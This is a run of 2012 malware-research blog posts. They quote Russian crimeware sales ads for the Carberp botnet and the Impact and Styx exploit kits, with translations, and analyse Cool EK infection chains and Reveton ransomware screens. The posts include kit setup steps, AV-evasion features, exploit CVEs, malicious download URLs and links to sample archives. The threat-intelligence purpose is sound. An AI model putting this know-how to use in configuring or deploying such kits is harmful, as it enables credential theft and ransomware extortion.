В админку добавляется список доменов и загружаются криптованные билды
Админка сама их проверяет на сервисах scan4you и chk4me
Раз в полчаса бот стучит в админку за новыми доменами и билдом
В зависимости от установленного на боте ав, админка отдает ему чистый билд и домены
При обновлении билда данным способом, преф и домены у бота остаются неизменными, вне зависимости от того что вшито в билд
Есть возможность просто проверять домены, без выдачи их ботам
Если у вас свой криптор в виде ехе, админка может сама криптовать билды, делая по 10 криптов за раз, проверить их, выбрать самый чистый и отдавать ботам, либо сделать постоянную линку на чистый билд для связки, а так же обновлять ехе криптора и уведомлять в jabber если крипт палится

-------------------------------

Поиск слов в документах

Искать можно как отдельные слова, так и словосочетания
Поиск производится внутри документов txt, doc, docx, xls, xlsx, pdf, rtf, odt, лежащих на диске, даже если они упакованы в zip или rar архив
Все найденные документы запаковываются в один архив и отправляются в админку

-------------------------------

Запись видео

При посещении определенного url в окне браузера на боте включается запись видео
Видео отправляется на windows-сервер, где запущен принимающий модуль
Видео пишется в нашем собственном формате, максимально сжатое и оптимизированное, ч/б 2fps
Для просмотра используется наш собственный плеер, в нем для удобства реализован быстрый поиск по названиям активных окон
По запросу можно индивидуально настроить запись видео - старт при определенном событии, запись полного экрана, запись в течение определенного времени и т.п.

-------------------------------

RDP и VNC

Удаленное подключение к ботам управляется через единое серверное windows-приложение
После подключения к серверу достаточно выделить бота и нажать кнопку подключения
Сервер пробросит один из своих портов и присвоит его боту, после этого можно подключаться и работать

-------------------------------

Гейты

Сервер, отличный от основного сервера с админкой, перенаправляющий запросы от ботов в админку, и отдающий ботам ответы от нее
Основная задача гейта - скрыть админку бота от абуз
Для гейта подойдет обычный впс, тут главное не железо, а канал
При абузе можно оперативно развернуть новый гейт, время установки ~30 минут
Гейтов может быть несколько, и все вести на одну админку
Есть несколько видов реализаций, в т.ч. на основе OpenVPN, но мы рекомендуем обычный Nginx-вебсервер, настроенный как прокси

-------------------------------

Буткит

Работает на Win XP/7, отстук ~60-80%
Устанавливается на ринг3 бота, поэтому если установка не удалась, ринг3 на боте останется в работоспособном состоянии
После установки происходит перезагрузка, и при удачном запуске бота из ринг0, ринг3 версия удаляется
АВ буткит найти не могут, так же как и бота, запускаемого через буткит, поэтому криптовать и обновлять не требуется
Даже если в будущем некоторые АВ смогут его найти, то все равно не смогут удалить, юзеру поможет только переустановка системы
Живучесть 65% и более через месяц после прогруза

-------------------------------

Правила предоставления лицензии

В одну лицензию входит админка на одном сервере с привязкой по ip + билдер бота и настройка одного гейта. За дополнительную плату можно настроить нужное количество гейтов. Ограничение лицензии в количестве серверов с админкой. Одна лицензия - один сервер.

Перенаправление ботов на ip, на который не ставилась наша админка, а равно где стоит отвязанная наша, либо своя, написанная под нашего бота, админка, запрещается. Мы следим за каждой лицензией очень внимательно, и если возникнет подозрение на попытку нарушения лицензии или отвязки бота/админки, мы оставляем за собой право принимать адекватные меры, вплоть до аннулирования лицензии и ddos доменов/серверов нарушителя.

Админка защищена системой IonCube последней версии. Бот защищен системами нашей собственной разработки. Так же в них присутствует дополнительное внутреннее шифрование, и специальные закладки, которые определяют ip/домены привязки. Если будет установлено, что бот/админка отвязаны, закладки вносят в работу системы случайные искажения, в итоге бот/админка начинают работать не правильно, выполнять не те команды, либо просто глючить. В итоге ботнетом станет невозможно управлять, будут теряться логи, боты будут дохнуть куда быстрее и т.п. Причем на первый взгляд отвязанный бот может работать и отстукивать так же, как и обычный. Дефекты можно будет обнаружить только при детальном анализе. С каждой новой версией, вместе с доработками по функционалу и улучшению отстука, также будет меняться и усложняться защита.

Софт предоставляется как есть, манибэк не предусмотрен. Перепродажа софта запрещена.

-------------------------------

Планы по разработке

- Инжекты и формграббер для Chrome
- 64-битность
- RPD под Win 7
- Лоадер минимального размера для всех комплектаций
- p2p для восстановления контроля над ботнетом

Курсивом отмечены обновления, которые будут распространяться бесплатно, при условии что модуль, к которому относится обновление, уже был приобретен
Если у вас есть собственные пожелания, мы добавим их в этот лист, определив приоритет разработки сами

-------------------------------

Обновления

Багфиксы в текущих модулях и мелкие дополнения к функционалу бесплатны
Новые модули и серьезные дополнения к текущим за отдельную плату
За дополнительную плату возможны любые доработки

-------------------------------

Грабберы и АЗ любой сложности

Мы принимаем заказы на написание грабберов и АЗ
У нашей команды огромный опыт в написании грабберов паролей, ключей, балансов и АЗ любой сложности под любые системы
Нами уже написаны грабберы и АЗ под системы на основе:
- HTML / Javascript
- ActiveX
- Java
- Win32
Благодаря тесному сотрудничеству наших программистов, мы можем подправить и дописать нашего бота под заказанные у нас АЗ для получения максимальных результатов
Есть полнофункциональная админка АЗ
Цены и условия оговариваются для каждого заказа отдельно
Это не сервис по написанию мелких инжей, работаем только с крупными заказчиками

-------------------------------

Прайс и контакты

Минимальная - $5к или $2к/мес
Расширенная - $10к или $3.5к/мес
Полная - $15к или $5к/мес

Буткит - $40к или $10к/мес

Установка админки - $100

Тест возможен по договоренности
Гарант приветствуется
Принимаем исключительно LR

Связь: batman@xabber.de

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: GnuPG v1.4.10 (GNU/Linux)

Removed - useless here
-----END PGP PUBLIC KEY BLOCK-----

-------------------------------

Требования к Админке бота:
php >= 5.3.3
IonCube Loader
php-mysqli
php-zip
php-geoip (можно и без него есть выносной но он менее производительный так что лучше этот откомпиленный прямо в пхп)
php-pcntl
Lighttpd + Lighttpd FastCGI + FastCGI Alow-XSendFile (Можно и Apache 2.2 но он мнее производительный, если захотите ставить его то к нему обязательно mod_xsendfile)
------------------------------------------
Translated by google as :
------------------------------------------
Carberp
Otstuk 60-90%
Win XP/Vista/7 x86
-------------------------------
Complete set
Each successive includes previous
Minimum:
- Loader
- FTP grabber (31 client)
- Passvord grabber
- Form Grabber (IE, FF, Opera)
- FTP sniffer
- Grabber basic-authentication in IE
- Remove cookie and sol in IE and FF
- DDOS
- Socks5 proxy
- Support injected in IE and FF
- A program for writing and debugging injected with convenient GUI
- Encrypted Traffic
- Builder
- Multi-bot Admin
Extended:
- Grabber Serta from IE
- Module Hunter
- Universal keylogger
- AutoUpdate crypt and Domains
- Search words in documents and send to the admin panel
- Video recording on the boat for debugging inzhey and AZ
- Enhanced functionality in the admin
Full:
- VNC (win xp/vista/7 admin / user) and RDP (win xp admin)
Bootkit:
- MBR-loader bot (win xp / 7)
-------------------------------
Program list grabber
Messengers
Miranda, ICQ2003, RQ,
Trillian, ICQ99b, MSN, Yahoo,
AIM, Gaim, QIP, Odigo, IM2,
SIM, GTalk, PSI, Faim, LiveMessenger,
PalTalk, Excite, Gizmo, Pidgin, AIMPRO,
MySpace, Pandion, QIPOnline, JAJC, Digsby,
Astra
Email clients
Becky, The_Bat, Outlook,
Eudora, Gmail, MRA, IncrediMail,
GroupMailFree, VypressAuvis, PocoMail,
ForteAgent, Scribe, POPPeeper,
MailCommander, Windows_Mail_Live, Windows_Mail_Vista
FTP clients
Total Commander, FAR Manager, WS_FTP, CuteFTP,
FlashFXP, FileZilla, FTP Commander, FTP Navigator,
BulletProof, SmartFTP, TurboFTP, FFFTP, CoffeeCup,
Core FTP, FTPExplorer, Frigate3, UltraFXP, FTPRush,
SecureFX, Web Publisher, BitKinex, Classic FTP PC,
Fling, SoftX FTP Client, Directory Opus, FreeFTP,
DirectFTP, LeapFTP, WinSCP
Browsers
Firefox, Safari, Opera, IE, Chrome
Other
SysInfo, WinVNC, ScreenSaver,
ASPNET, RDP, FreeCall, CamFrog,
PCRemoteControl, NetCache, CiscoVPN,
Credentials
-------------------------------
Socks5 proxy
To receive a bot uses windows-server application
When bot knock, the server connects and hangs it on a different port
Makes bots SOCKS5-proxy
Web-based interface for connection and control bots
-------------------------------
Inject
Injection works on IE and FF
Is supported by G, P, and L
Syntax 1B1 as Zeus, but just in case you need to check on the performance of
There is a convenient debugger injected with which it is easy to check its inzhey and write new
-------------------------------
Traffic Encryption
All traffic from the spammer to admin and back encrypted unique key for each botnet
Bots can not knock on the admin area to another key
All requests from the bot to go to the admin scripts with random names
All plug-ins, download bot from admin, just encrypted
-------------------------------
Module Hunter
When you visit a particular url bot requests from admin certain command, so for example you can include all of the DSA bots who went to the bank or upload any exe
-------------------------------
Universal keylogger
Through admin defined list of processes that need to benefit from logging keystrokes
Bots get a list and send the admin logs as they become available
In the admin logs are divided not only on the processes and individual bots, but for different applications launch
-------------------------------
AutoUpdate crypt and domains
Update bots crypt to clean and domains without otstuk perebildinga and update bots
In the admin panel added a list of domains and loaded kriptovat builds
Admin checks for their own services and scan4you chk4me
Every half hour boat knocks in admin for the new domains and builds
Depending on the set on the boat AB admin panel gives it a clean build and domains
When you update the build this way, preferred shares and domains bot are the same, regardless of the fact that the resident in build
It's easy to check domains, without giving them the bots
If you have your own kriptor as exe, admin panel itself can kriptovat builds, making 10 of the crypts at a time, check them out, choose the cleanest and give bots, or to make a permanent link on the net to build chords, as well as update and notify exe kriptora in jabber if crypts palitsya
-------------------------------
Search for words in documents
You can search for a specific word or phrase
The search is performed within the documents txt, doc, docx, xls, xlsx, pdf, rtf, odt, lying on the drive, even if they are packed in zip or rar archive
All documents found packed in one file and go to the admin panel
-------------------------------
Video recording
When visiting a specific url in the browser on the boat and the recording video
Videos sent to windows-server running receiver module
Video is written in our own format, maximum compression and optimized, b / w 2fps
To view using our own player, it is implemented for the convenience of a quick search on the name of the active window
On request, you can customize video recording - the start of a specific event, record the full screen, a record for a certain time, etc.
-------------------------------
RDP and VNC
Remote connection to the bot is controlled via a single server windows-application
After connecting to the server, just select the bot and press the connect button
Server forwarding one of its ports and assign it to the boat, then you can connect and work
-------------------------------
Gates
Server other than the primary server with the admin, the request is redirected to the admin panel of bots, bots and giving answers from her
The main objective of the gate - hide admin bot from abuse
For your regular gate UPU, the main thing is not the iron, and the channel
When abuse can quickly deploy a new gate, install time ~ 30 minutes
Gates can be several, and all lead to one admin
There are several types of implementations, including based on OpenVPN, but we recommend the normal Nginx-webserver is configured as a proxy
-------------------------------
Bootkit
Works on Win XP / 7, otstuk ~ 60-80%
Mounted on ring3 bot, so if the installation failed, the boat ring3 remain in a healthy state
After installation is restarted, and if successful launch bot from ring0, ring3 version is deleted
AB bootkit can not find, as well as a bot that runs through bootkit kriptovat and therefore do not need to update
Even if in the future some AV can find it, you still can not remove, the user will only reinstall
Vitality 65% ​​or more in a month after progruza
-------------------------------
Rules for granting licenses
One license is admin page on the same server with reference to ip + boat builder and configure a gateway. For an additional fee, you can configure the desired number of gates. License restriction in the number of servers from the admin. One license - one server.
Redirecting bots on ip, which was not put our admin panel, as well as where there is untied our or its written under our boat, admin panel, is prohibited. We monitor each license carefully, and if there is a suspicion of attempted violation of the license or otvyazki bot / admin, we reserve the right to take appropriate action, up to revocation and ddos ​​domain / server offender.
Admin protected with IonCube latest version. Boat protected systems of our own design. Just as they present additional internal encryption and special bookmarks that define ip / domains binding. If it is found that the bot / Admin decoupled, bookmarks make to the work of random distortion, resulting in a bot / Admin begin to not work properly, do not carry out the commands, or simply fail. As a result, it becomes impossible to control the botnet will be lost logs, bots will breathe much faster, etc. And at first glance, the bot can work untethered and knock in the same way as normal. Defects can be detected only by detailed analysis. With each new version, along with modifications to the functional and improved otstuk also will change and become more complex protection.
Software is provided as is, manibek not provided. Resale of software is prohibited.
-------------------------------
Plans to develop
- Inject and formgrabber for Chrome
- 64-bit mode
- RPD under Win 7
- Loader minimum size for all models
- P2p to regain control of the botnet
Italics marked updates that will be distributed free of charge, provided that the unit to which the update has already been purchased
If you have your own suggestions, we will add them to this list, prioritize the development of themselves
-------------------------------
Updates
Bug fixes in the current module and minor additions to the functional free
New modules and major additions to the current for a fee
For an additional fee, any possible improvements
-------------------------------
Grabbers and AZ of any complexity
We accept orders for writing grabbers and AZ
Our team has extensive experience in writing grabbers passwords, keys, balance sheets and AZ any difficulty under any system
We have already written a grabber and AZ-based systems:
- HTML / Javascript
- ActiveX
- Java
- Win32
Thanks to the close cooperation of our programmers, we can adjust and finish our bot order the AZ for maximum results
There is a full featured Admin AZ
Prices and conditions are specified for each order separately
This is not a service for writing small inzhey, work only with large customers
-------------------------------
Price and contact
Minimum - $ 5k or $ 2k/mes
Extended - $ 10k or $ 3.5k/mes
Complete - $ 15k or $ 5k/mes
Bootkit - $ 40k or $ 10k/mes
Setting admin - $ 100
The test is available by arrangement
Guarantor welcome
Accept only LR
Communication: batman@xabber.de
----- BEGIN PGP PUBLIC KEY BLOCK -----
Version: GnuPG v1.4.10 (GNU / Linux)
Removed - useless here
----- END PGP PUBLIC KEY BLOCK -----
-------------------------------
Requirements for Admin bot:
php> = 5.3.3
IonCube Loader
php-mysqli
php-zip
php-geoip (possible and without it there is remote but it is less efficient so it is better this otkompilenny right in php)
php-pcntl
Lighttpd + Lighttpd FastCGI + FastCGI Alow-XSendFile (Can and Apache 2.2 but mnee productive if you want to put it to him that necessarily mod_xsendfile)
------------------------------------------



Carberp C&C login screen

Some fresh comodo sandbox analysis (samples spotted thanks (!) to VirusTotal ) :
http://camas.comodo.com/cgi-bin/submit?file=d2a3060511fdc86729a6ec0881e50846b47362db2d6392b6ef00536417e14410
http://camas.comodo.com/cgi-bin/submit?file=689a35928f71848fab346b50811c6c0aab95da01b9293c60d74c7be1357dc029
http://camas.comodo.com/cgi-bin/submit?file=a6d77a5ba2b5b46a0ad85fe7f7f01063fe7267344c0cecec47985cd1e46fa7a4
http://camas.comodo.com/cgi-bin/submit?file=b998233b85af152596f5087e64c2cadb1466e4f6da62f416ac3126f87c364276

Read more about Carberp ? (recent first)
All Carberp botnet organizers arrested -2012-07-02 - Aleksandr Matrosov - Eset
Carberp Gang Evolution: CARO 2012 presentation - 2012-05-29 - Aleksandr Matrosov - Eset
Carberp Reverse Engineering - 2011-07-03 - Evilcry - quequero.org
Under the Hood of Carberp: Malware & Configuration Analysis (PDF) - 2010-10-7 - Trusteer
Inside Carberp Botnet (PDF) - 2010-02 - Francisco Ruiz - MalwareIntelligence

For more readings take a look at the list of References on Botnets.fr Carberp page here :
https://www.botnets.fr/index.php/Carberp

Inside Impact Exploit Kit - back on track (?)

December 13, 2012, 10:07 am

≫ Next: Big update for Cool EK

≪ Previous: Carberp, the renaissance (?)

$

0

0

Impact Logo ( credits : Kahu Security )

My first contact to Impact Exploit Kit was possible thanks to @switchingtoguns.
The identification of the pack and my second contact is fully based on information provided by Kahu Security.
Want to thanks someone who will recognize himself for confirming me many similitude with Sakura.

I was not able to find any advert about this Exploit Kit. If you know where to find it, feel free to send a mail ;)

We'll start so with the readme

------------------------------------------

Последнее обновление : 30.11.2012 


Побеждены эмуляторы КАВ и прочих антивирусов, выросла продолжительность жизни доменов.
Добавлены АПИ, добавлен крон для обновления файла через веб (cron_fileupload.php)
Добавлена смена доменов ставим на крон (cron_check.php)
Не забудьте указать данные ваши даныне http://scan4you.net в файле conf.lex
** wget


Эксплойты:
- CVE-2010-0188 (PDF LibTiff)
- CVE-2008-0655 (PDF colEmail)
- CVE-2012-1723 (Java Applet Field Bytecode)
- CVE-2012-5076 (Java New Bytecode bypass)

Все эксплойты тщательно проверены на стабильность, за счет чего % отстука достигает максимально возможного уровня.
- Все эксплойты применяемые в связке собраны (переписаны мной) с нуля и максимально оптимизированы. Весь кэш попадающий в temp составляет всего 32кб и не детектируется АВ даже во время работы.
- Реализация эксплойта PDF LibTiff уникальна. Эксплойт был переработан с нуля в результате чего удалось добиться десятикратного снижения потребления ОЗУ (29 мегабайт по сравнению с 230+ мегабайт в других связках), за счет этого стабильность данного эксплойта сильно возросла. Эксплойт не мешает работе пользователя после пробива, не приводит к зависанию браузеров и плагинов.


Связка снабжена интеллектуальной системой выдачи. Все эксплойты перед выдачей проходят проверку, не вываливается никаких ненужных окон. Система выдачи хорошо оптимизирована и в отличие от других связок не приводит к задержке выдачи.

- Связка держит до 1кк траффика. Возможна дальнейшая оптимизация под ваши запросы (опционально).
- Качественный саппорт (ежедневно в сети). Решение любых вопросов связанных со связкой в кратчайшие сроки.
- Благодаря продвинутым техникам используемым в связке, палится она намного реже любой из связок доступной в открытой продаже.

Установка и настройки:

1) Настроить mysql в config.php

Настроить ротацию доменов где:

$changeOption='result'; //result - менять домены по результату скана, time - менять домены по времени
$resultLimit1=2;        // > = полученого результата, меняем домен

2) Залить содержимое на сервер.
3) Поставить права на chmod на директорию agueract.
4) Запустить инсталятор.
5) Загружаем файл через админку.
6) Добавить домены через вкладку Domain.
7) Создаем нить и пускаем трафик.
------------------------------------------
translated by Google as :
------------------------------------------

Last Updated: 30/11/2012


CAV defeated emulators and other anti-virus, increased life expectancy domains.
Added to the IPA, added crowns to update the file via the web (cron_fileupload.php)
Added change domain put on crowns (cron_check.php)
Be sure to include your data in the file danyne http://scan4you.net conf.lex
** Wget


Exploits:
- CVE-2010-0188 (PDF LibTiff)
- CVE-2008-0655 (PDF colEmail)
- CVE-2012-1723 (Java Applet Field Bytecode)
- CVE-2012-5076 (Java New Bytecode bypass)

All exploits thoroughly tested for stability, thereby% otstuk reaches the maximum possible level.
- All the exploits used in conjunction collected (transcribed by me) to zero and optimized. Entire cache getting in temp is only 32kb and not detected AB even during operation.
- Implementation of the exploit PDF LibTiff unique. An exploit has been redesigned from the ground up as a result of what has been achieved a ten-fold decrease in consumption of RAM (29 MB compared to 230 + megabytes in other bundles), at the expense of the stability of the exploit has greatly increased. The exploit does not interfere with the user after punching, does not lead to crash browsers and plug-ins.


Equipped with a bunch of intelligent delivery. All exploits before issuing tested, falls out any unnecessary windows. Permit system is well optimized and unlike other ligament does not lead to a delay of issuance.

- Bundle 1kk holds up traffic. Further optimization is possible to meet your needs (optional).
- High-quality support service (daily in the network). Resolving any issues related to the bunch in no time.
- Thanks to advanced techniques used in tandem, it is much less palitsya any cords accessible to the public.

Installation and configuration:

1) Set up mysql in config.php

Adjust the rotation domains where:

$ ChangeOption = 'result'; / / result - change domains for the scan result, time - time to change domains
$ ResultLimit1 = 2 / /> = the obtained result, we change the domain

2) Pour the contents of the server.
3) Put the right to chmod the directory agueract.
4) Run the installer.
5) Load the file via the admin area.
6) Add a tab Domains Domain.
7) Create a thread and to start up the traffic.

------------------------------------------

Now let's go to the first impact :

Impact EK Landing

"Все эксплойты тщательно проверены на стабильность, за счет чего % отстука достигает максимально возможного уровня."


CVE-2012-5076 :

Impact EK - CVE-2012-5076 Positive Path

GET http://78.xxx.xx3.12x/lashsenc.php?boutearn=674660
200 OK (text/html)

GET http://78.xxx.xx3.12x/fagearge.php
200 OK (application/pdf)

GET http://78.xxx.xx3.12x/jollaban/tionlase.jar
200 OK (application/java-archive)

GET http://78.xxx.xx3.12x/jollaban/capelazy.jar
200 OK (application/java-archive)

GET http://78.xxx.xx3.12x/cutelity.php
200 OK (application/x-msdownload)

CVE-2012-5076 but seems implemented in a slightly different way than what we can see on other EK

CVE-2012-1723 :

Impact EK - CVE-2012-1723 path

(sames URLs)

CVE-2012-1723 in one jar of Impact EK

CVE-2010-0188 :

Impact EK - CVE-2012-0188

http://wepawet.iseclab.org/view.php?hash=b5dde85c8f79018266080f7e9ddb30e9&type=js

CVE-2008-0655 :

Was not able to get infected with the proper configuration (Adobe Reader 8.1.1) ..don't know why.

Out of the scope. The payload ? Zbot it seems. Recslurp.A (thx Horgh ! :) )
fc866cab7cda3de7c45a2691544d724d  - http://dl.dropbox.com/u/106864056/2ebd0.zip (7ziped - public pass)

Inside view :

Total :

Impact EK - Total - Note : the High % of break is mainly linked to a the kind of traffic landing here

Browser :

Impact EK - Browser - here is the why of the % of break. Old IE meaning quite surely computer not up to date, quite surely TDS filtered traffic.

OS:

Impact EK - OS

Country:

Impact EK - Country

Referer:

Impact EK - Referer

Upload exe:

Impact EK - Upload exe

Domain :

Impact EK - Domain (note the "clean" check and the domain rotation trigger You can read more about that needs here )

Impact EK - Domain Check Well done MDL !! :)

Thread :

Impact EK - Thread - Add

Impact EK - Thread - Links

You have a weird feeling of Déjà Vu ?
Sure :)

Side to side Sakura vs Impact http://i4.minus.com/iboOasskqfVOZE.png

I first thought that this Impact was inspired by Sakura (based on the install process and link), then have been told it was a dirty Sakura 1.0 "CSSed" rip. Now, based on Kahu Security information, I wonder if Sakura is not a rip of that Impact. To be honest I don't know for sure. Maybe a new thing based on both....

Files (private password) :
http://dl.dropbox.com/u/106864056/ImpactEK_2012-12.zip

Big update for Cool EK

December 17, 2012, 9:29 pm

≫ Next: Reveton - Winter Collection

≪ Previous: Inside Impact Exploit Kit - back on track (?)

$

0

0

Yesterday (2012-12-18) around 13h GMT I was not the only one (o/ Ekse) to noticed that something was happening on the Cool EK Front. (At least the one owned by the group pushing Reveton).
Landings in /r/ were replying with a "502 bad gateway"
Landings in /t/ were replying with a "ERROR 404 CONTENT"


Few hours later Malekal spotted the new landings.

So let's take a look at that.

Landing page filed with random data

The landing is now feed with random data.
In really small at beginning I saw for instance :
<div class='Minister'>curse: changing =)</div>
<div class='Shortly'>pass: vehicle =)</div>
<div class='neglect'>Reflection: NORTH =)</div>

The Plugin detect is not easy to read...lot of stuff.
After fast cleaning still need some time to read it. ( see for instance : http://pastebin.com/7xxj25KR )

Cool EK Landing after some cleaning

Sun Java :

Java ?

CVE-2012-4681 - CVE-2012-5076 :


GET http://50cf96399f208.transumancia .com/news/privileged.asp
200 OK (text/html) b3eb3375487191d20e6ad4854bb3d22b

GET http://50cf96399f208.transumancia .com/news/HEADMASTER-SUSPICIOUS.EOT
200 OK (text/html)
778ce2bf0593b021865df133ddbf2c1f (32bits)
062be3ecbdd356381126528ff131c391 (64bits)

GET http://50cf96399f208.transumancia .com/news/opinion-toss.jar
200 OK (application/java-archive)  77b464ae2e64efce193911191e31ab7f

GET http://50cf96399f208.transumancia .com/news/opinion-toss.exe
200 OK (application/x-msdownload) (out of scope...Reveton : 924bd8a4dbac809d1b139a2be6492fc1 )

CVE-2012-4681 Positive Path

CVE-2012-5076 Positive Path

CVE-2012-5076  in the opinion-toss jar

CVE-2012-0507 :


GET http://50cf96399f208.transumancia .com/news/privileged.asp
200 OK (text/html)

GET http://50cf96399f208.transumancia .com/news/HEADMASTER-SUSPICIOUS.EOT
200 OK (text/html)

GET http://50cf96399f208.transumancia .com/news/opinion-toss.jar
200 OK (application/java-archive) a1df4db82e9cf9c54a070332586c0877

GET http://50cf96399f208.transumancia.com/news/opinion-toss.exe
200 OK (application/x-msdownload)

CVE-2012-0507 Positive Path

CVE-2012-1723 :


GET http://frequent.dwyane-wade .org/news/opinion-toss.jar
200 OK (application/java-archive)  98a777ce628d7f7cf34ec4699119d815

CVE-2012-1723 Positive Path

CVE-2012-1723 in a 3rd opinion-toss jar

Adobe Reader : 

Adobe Reader ? for you BLESS1 or president2

GET http://50cf9f4e59a7d.triptoromania .com/news/DEFY/BLESS1.PDF (new PDF)

200 OK (application/pdf)  8e1bf290252776a94f48c6e6d4d6a6e5 (wepawet escaped)

GET http://50cfc981724ac.weareone-group .es/news/president2.pdf  (Old PDF at least CVE-2009-0927)
200 OK (application/pdf)  141dfa2439a3ce71c73fa4f691ed8216 (wepawet win)

Shell code revealed by Wepawet in president2.pdf

GET http://50cfd1b9790e9.weareone-group .eu/news/opinion-toss4.exe

200 OK (application/x-msdownload) d54d18c803869e631a7d0e6d5fb32512 (Reveton)

Adobe Flash Player

diamond2 flash call

Tried with Flash Player 
10.2.153.1 (CVE-2011-0611 ) seems safe
10.3.181.22 (CVE-2011-2110 (?) seems safe.
11.2.202.233 safe....

So had to use magic powder (so not 100% sure of the result, in fact have the feeling it's not ok) to :


GET http://50cfe21f5124a.appartamentogenova .net/news/said/diamond2.swf?info=02e67fbb3b74fa5a767eba652bd9088b98214cdf58f3ecfc585cc4a4e3c90da1f298befd5ab4c6faadfad5f25ca2d9c74866dbcc3650d5e9cf48b05f2328faa1f40b8588f16db1
200 OK (text/html) c57414b2160d4139f1334a4533dc2da1

GET http://50cfe21f5124a.appartamentogenova .net/news/GRAVEL/STANDING3.SWF?info=02e67fbb3b74fa5a767eba652bd9088b98214cdf58f3ecfc585cc4a4e3c90da1f298befd5ab4c6faadfad5f25ca2d9c74866dbcc3650d5e9cf48b05f2328faa1f40b8588f16db1
200 OK (text/html)  96affff5b127372d761e91b312a53fa1

getShellCode

<edit2 19/12/12 12:30>

The shellcode is : http://pastebin.com/raw.php?i=2NJ3YHKG

Running Thug locally on it you'll get an amazing result (hat tip to Angelo and Markus working hard to make our days easier)

ShellCode Analysis via Thug Txt here : http://pastebin.com/raw.php?i=UuWmz2vR

</edit2>

As usual to be safe here...just update your Java/Flash/Adobe Reader and Windows


One last word about Reveton. As you may have seen by Trend Micro, in United States Reveton is showing a new design.
I really hope they will make a step backward cause this one is going too far...pushing a really disturbing image to the face of anyone in front of the screen at infection time.

Reveton last US Design.

The "pseudo" treaty between antivirus vendor and Police explaining how you got that screen.

Files : http://dl.dropbox.com/u/106864056/CoolEK%202.zip Public Password (usual password for infected stuff)

<edit1 18/12/12 - 19h> Fixed CVE-2012-0507 (not 0506). Thx @eromang.</edit1>
More about Cool EK ?
Cool Exploit Kit Remove Support of Java CVE-2012-1723 - 2012-12-02 - Eromang - Eric Romang Blog
Cool-er Than Blackhole? - 2012-11-16 - Timo Hirvonen - F-Secure
Cool EK : "Hello my friend..." CVE-2012-5076 - 2012-11-09
Cool Exploit Kit - A new Browser Exploit Pack on the Battlefield with a "Duqu" like font drop - 2012-10-09

More about Reveton ?
Reveton can speak now ! - 2012-11-23
Reveton += HU, LV, SK, SI, TR (!), RO - So spreading accross Europe with 6 new Design 2012-10-29
Reveton Autumn Collection += AU,CZ, IE, NO & 17 new design - 2012-10-12
Kernel Mode Thread

Reveton - Winter Collection

December 20, 2012, 3:13 pm

≫ Next: Crossing the Styx ( Styx Sploit Pack 2.0 ) - Meet CVE-2012-4969 via JS heapspray

≪ Previous: Big update for Cool EK

$

0

0

Winter is coming, so is Reveton's Winter Collection (obviously replacing the Autumn Collection on which they added sound for some countries past month).

The new design was first spotted by Trend Micro on december 10th but was only limited to United States.
It was displaying a shocking picture. Since few hours the new design has been propagated to all targeted countries.

Reveton UK (12-2012) - Is the Default if your country has no specific design

Reveton Winter Collection in one image

What's new ? It seems it's not speaking anymore. I guess that did not increased conversion rate at all...
There is a Tabbed system for payment.

You are warned that if you try to unlock your computer yourself you'll loose all your data.

<edit : 26/12/12> This is only a warning, this won't happen as explained by Jeet Morparia from Symantec here.</edit>

300$ in the US !

A count down :

It make think your Antivirus has been modified for cyber-criminals identification after signature of an International Treaty between LEA and Antivirus Vendors :

Good news ! They removed the shocking image that was on US Design and seen on the similar DE design of a Tobfy ( 0b1cfd537eb568089daf2892a8e22049 - c6378145d48ed77cbda7ea46ee670685 ) !

In choosen order

Reveton ES (12-2012)

Note to self :  Do not forget to respect the law in Spain.

Reveton RO (12-2012)

Hum wait...Senātus Populusque Rōmānus ?? Is it me or... made me browse Wikipedia.

Now in alphabetical order :

Reveton AT (12-2012)

Reveton AU (12-2012)

Reveton CA (12-2012)

Reveton DE (12-2012)

Reveton CY (12-2012)

Reveton CZ (12-2012)

Reveton DE (12-2012)

Reveton FI (12-2012)

Reveton FR (12-2012)

Reveton GR (12-2012)

Reveton HU (12-2012)

Reveton IE (12-2012)

Reveton IT (12-2012)

Reveton LU (12-2012)

Reveton LV (12-2012)

Reveton NL (12-2012)

Reveton NO (12-2012)

Reveton SE (12-2012)

Reveton SI (12-2012)

Reveton TR (12-2012)

Reveton US (12-2012)

After Paysafe card payment (You SHOULD NOT see cause you must not pay!) Note count down which drop from 48h to 2h

After valid Ukash number insertion (You SHOULD NOT see cause you must not pay!)

Call to mother

As usual have trouble gathering PT and BE landing pages...seems I now also have problem with PL and SK.
For DK and LT seems Default (UK) is being pushed.


Sample : 5bd641a67baaa09af76c74e25b7b43bb - here : http://dl.dropbox.com/u/106864056/5BD641A67BAAA09AF76C74E25B7B43BB.zip


More about Reveton ?
See Reveton page on https://www.botnets.fr/index.php/Reveton
Kernel Mode Thread

Reveton can speak now ! - 2012-11-23
Reveton += HU, LV, SK, SI, TR (!), RO - So spreading accross Europe with 6 new Design 2012-10-29
Reveton Autumn Collection += AU,CZ, IE, NO & 17 new design - 2012-10-12
Inside a ‘Reveton’ Ransomware Operation 2012-08-13

---

Crossing the Styx ( Styx Sploit Pack 2.0 ) - Meet CVE-2012-4969 via JS heapspray

December 21, 2012, 3:06 pm

≫ Next: Juice the Sweet Orange - 2012-12

≪ Previous: Reveton - Winter Collection

$

0

0

(Lorenz-84 - For the thumbnail)

Styx Logo

No need to go on underground forum to find Styx Sploit Pack. The Styx-Crypt guys are selling their services publicly on styx-crypt[.]com

styx-crypt[.]com Logo and menu

(this remind me of Paunch also selling publicly on crypt[.]am his Crypt Services. But you won't find information on his Blackhole there )

Since March 2012 (correct me if i'm wrong) they are also providing an Exploit Kit.
(I first heard about it via @SecObscurity )
One week ago they announced the availability of the version 2.0

Printscreen from styx-crypt[.]com/ru/read/styx-pack.xml

Original Text :
------------------------------------------

2012 год заканчивается и в преддверии Армагеддона мы рады сказать, что наши новости закончились далеко не все. С гордостью представляем Styx Vulnerability Browser Stress Test Platform 2.0 - современный набор программного обеспечения для тестирования уязвимостей в браузерах. 

Наша команда около трех лет разрабатывала и тестировала продукт, качество которого не заставит усомниться самых требовательных пользователей, поскольку разработан и протестирован он на наших же продкутах в связке с обфускатором.

Мы провели достаточное время, работая в частном режиме для себя, но теперь и вы можете насладиться всеми преимуществами, которые предоставляет Styx Sploit Pack 2.0:

• Обновления через GIT с мастер-сервера по детекту любого сплойта;
• Отсутствует привязка к доменам: вы можете задавать любое количество доменов без ребилдов;
• Отсутствуют ограничения по трафику. Лейте столько трафика, сколько выдержат каналы вашего сервера и его аппаратные мощности;
• Скорость. Продукт способен обработать столько соединений, сколько MIPS у вашего процессора.
